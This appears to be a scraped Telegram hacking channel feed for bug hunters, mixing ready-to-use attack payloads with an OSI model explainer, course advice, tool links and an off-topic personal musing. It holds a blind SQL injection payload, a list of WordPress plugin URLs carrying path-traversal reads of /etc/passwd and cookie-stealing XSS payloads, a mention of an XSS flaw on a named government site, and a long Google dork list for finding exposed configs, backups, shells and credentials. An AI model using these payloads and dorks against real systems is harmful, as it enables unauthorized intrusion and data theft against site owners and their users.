2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
⚡️Wordpress Endpoints to look -
check this if you have these plugin. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.
Join the discussion group guys
/channel/bug_hunting_talks
today i got an intresting reflected xss, in karnataka gov website
/kn where the lang_name param is vulnerable
Thanks, guys for this suggestion I was stuck but seeing the money and the content provided by hackthebox academy, i am planning to first take the CPT as it covers almost all the topics and also so many people says that the exam. Is more tougher than oscp, so after reading all those articles and redit suggestion and youtube review, I am planning to first complete the CPT, once done later I will take the OSCP. And I also suggest you guys this only if you are a beginner or a intermediate, first take the alternative courses to oscp, and once you get things done, you will get confident and later you can pass the oscp in one time. Bec it cost a lot........ 🤑💰
Читать полностью…
Follow the Tech Tips and_hacking channel on WhatsApp: https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A
Читать полностью…
Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!"
Читать полностью…
OSI Model
____ __ _
The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.
The Seven Layers:
1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.
2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.
3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.
4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.
5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.
6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.
7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.
Video coming soon guys
Give a lot of reaction to this
#Tech_book
#cryptography
"Cryptography and Embedded Systems Security", 2024.
#exploit
"Find and exploit race condition bugs in modern JS engines".
Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html
Читать полностью…
What are the basic goal of good Reconnaissance
Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents
https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
🔗https://github.com/Tib3rius/AutoRecon
Actually I am using foreign number soo not to worry if It's ban in India.
Читать полностью…
pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce" rel="nofollow">https://medium.com/@pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce
Читать полностью…
I am really. Sorry guys, I left my place bec of some emergency work. I will only coming back on Monday soo I will not going to be active till Monday, soo please don't mind.
Читать полностью…
Small update on the upcoming video
I will upload it soon😌
I was Meditating for Ideas And This Popped up
" The Thoughts From Universe"
Idk We will call It whatever
Coz I am not familiar with this concept
Says That
Universe Live At Harmony at Neutral state(=) and That's the Refresh point
But Grows and Falls on charge state ( - or +)
Means At charged State It Grows
Eg - Success and Failure
And In Charge state
Both comes in one Hand
If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge
Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins
But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point
Like If You Are Having Intense Cravings about Something
Then Then Think Painful thoughts about that Addiction
Then Thing will neutralise
I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe
I know it sounds lots like Yapping
But I would take it seriously
- Aijak Ofc
Bug-Bounty notes
>💛Welcome to the Future of Cybersecurity
>Overview
👣OSINT
ℹ️Recon Tips
>✳️Mastering the Art of Writing Clear and Effective Vulnerabilities Report
>Twitter
🌆Subdomain Enumeration
>Tools
🔑Nmap's NSE Scripts for Ethical Password Testing
👻Cheat-sheet's
>Exploitation
Link 🔗:-
Https://book.cipherops.xyz
Author: @laazy_hack3r
@GitBook_s
LFI | RFI | Traversal Cheat Sheet 🔰
🔖#infosec #cybersecurity #hacking #pentesting #security
#Cyber_Education
Using SeTcbPrivilege for educational purposes
https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb
# Google Dorks Cli
# https://github.com/six2dez/degoogle_hunter
degoogle_hunter.sh company.com
# Google dorks helper
https://dorks.faisalahmed.me/
# Code share sites
site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company"
# GitLab/GitHub/Bitbucket
site:github.com | site:gitlab.com | site:bitbucket.org "company"
# Stackoverflow
site:stackoverflow.com "target.com"
# Project management sites
site:http://trello.com | site:*.atlassian.net "company"
# Pastebin-like sites
site:http://justpaste.it | site:http://pastebin.com "company"
# Config files
site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini
# Database files
site:target.com ext:sql | ext:dbf | ext:mdb
# Backup files
site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
# .git folder
inurl:"/.git" target.com -github
# Exposed documents
site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
# Other files
site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf
# SQL errors
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
# PHP errors
site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error"
# Login pages
site:target.com inurl:signup | inurl:register | intitle:Signup
# Open redirects
site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http
# Apache Struts RCE
site:target.com ext:action | ext:struts | ext:do
# Search in pastebin
site:pastebin.com target.com
# Linkedin employees
site:linkedin.com employees target.com
# Wordpress files
site:target.com inurl:wp-content | inurl:wp-includes
# Subdomains
site:*.target.com
# Sub-subdomains
site:*.*.target.com
#Find S3 Buckets
site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target"
# Traefik
intitle:traefik inurl:8080/dashboard "target"
# Jenkins
intitle:"Dashboard [Jenkins]"